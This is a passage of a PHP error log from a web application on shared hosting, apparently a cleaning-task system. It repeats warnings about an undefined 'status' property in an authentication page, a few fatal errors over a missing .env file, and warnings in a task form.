Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 05:12:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:01:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:20:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:25:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:29:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:29:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 06:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 07:09:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 07:59:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:02:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:21:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:22:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [09-Aug-2024 08:52:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [10-Aug-2024 10:45:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [14-Aug-2024 05:39:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [14-Aug-2024 13:30:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Aug-2024 03:55:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Aug-2024 04:16:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Aug-2024 05:36:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Aug-2024 06:37:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:39:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:39:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:44:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 11:51:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [02-Sep-2024 12:04:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 04:59:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 12:49:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 13:41:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [03-Sep-2024 14:17:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Sep-2024 02:04:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Sep-2024 06:15:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [04-Sep-2024 07:06:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 07:29:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/../.env]. in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Service/UserService.php(12): Database->__construct() #3 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Sep-2024 07:30:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/../.env]. in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Service/UserService.php(12): Database->__construct() #3 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Sep-2024 07:31:28 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/../.env]. in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/Service/UserService.php(12): Database->__construct() #3 /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [15-Sep-2024 07:41:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php on line 19 [15-Sep-2024 07:45:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php on line 19 [15-Sep-2024 07:46:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/test/emeraltd_prod/pages/authenticateuser.php on line 19 [15-Sep-2024 08:02:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 08:03:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 08:04:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 09:56:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [15-Sep-2024 12:37:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 04:10:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 06:29:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 07:45:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 09:12:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 09:31:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 11:18:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:11:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:27:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:29:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:35:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:37:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:37:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:39:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:40:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:43:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:44:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:50:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:59:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 12:59:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:13:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:14:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:44:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [16-Sep-2024 13:46:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:06:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:17:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:19:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:21:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 03:22:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:16:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:20:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:27:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:27:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:28:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:29:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:30:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:30:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:36:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 04:37:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 05:33:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 05:58:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [17-Sep-2024 07:37:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [18-Sep-2024 01:09:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Sep-2024 03:56:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Sep-2024 05:06:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [19-Sep-2024 05:43:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 00:24:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:27:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:28:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:38:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 01:59:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 02:43:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 03:18:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 05:27:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:22:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:23:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:25:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [20-Sep-2024 06:58:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [21-Sep-2024 04:23:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [21-Sep-2024 04:42:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 04:36:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 05:20:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 10:26:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 11:18:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 13:21:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 15:27:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 17:27:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 23:33:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [22-Sep-2024 23:55:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:13:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:23:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:36:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:37:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 01:47:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:02:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:19:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:23:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 02:48:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:02:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:10:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:29:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 03:39:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 04:03:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 04:09:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 04:54:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 05:44:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 05:49:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:09:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:11:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:23:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:27:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:38:22 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 06:52:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 07:15:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 07:16:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:01:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:20:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:22:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:22:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 08:33:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 18:39:46 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 198 [23-Sep-2024 18:41:19 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 198 [23-Sep-2024 18:46:40 Australia/Sydney] PHP Warning: Attempt to read property "assignedCleaneremail" on bool in /home/ftmgc76wdee4/public_html/pages/taskform.php on line 198 [23-Sep-2024 08:57:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 09:56:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 09:57:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 10:52:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 13:37:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 14:52:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 19:19:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [23-Sep-2024 22:53:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 01:19:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 01:30:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 01:48:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 02:36:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 03:19:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 03:34:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 04:32:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 04:34:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 04:40:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:41:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:51:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:51:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:52:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 05:54:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 06:12:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 06:18:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 06:21:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 07:16:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 07:52:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 08:14:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 08:37:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 08:43:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 09:13:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 10:16:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 10:54:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 12:28:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 12:39:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 12:41:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 13:36:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/ftmgc76wdee4/public_html/pages/authenticateuser.php on line 19 [24-Sep-2024 22:58:03 UTC] PHP 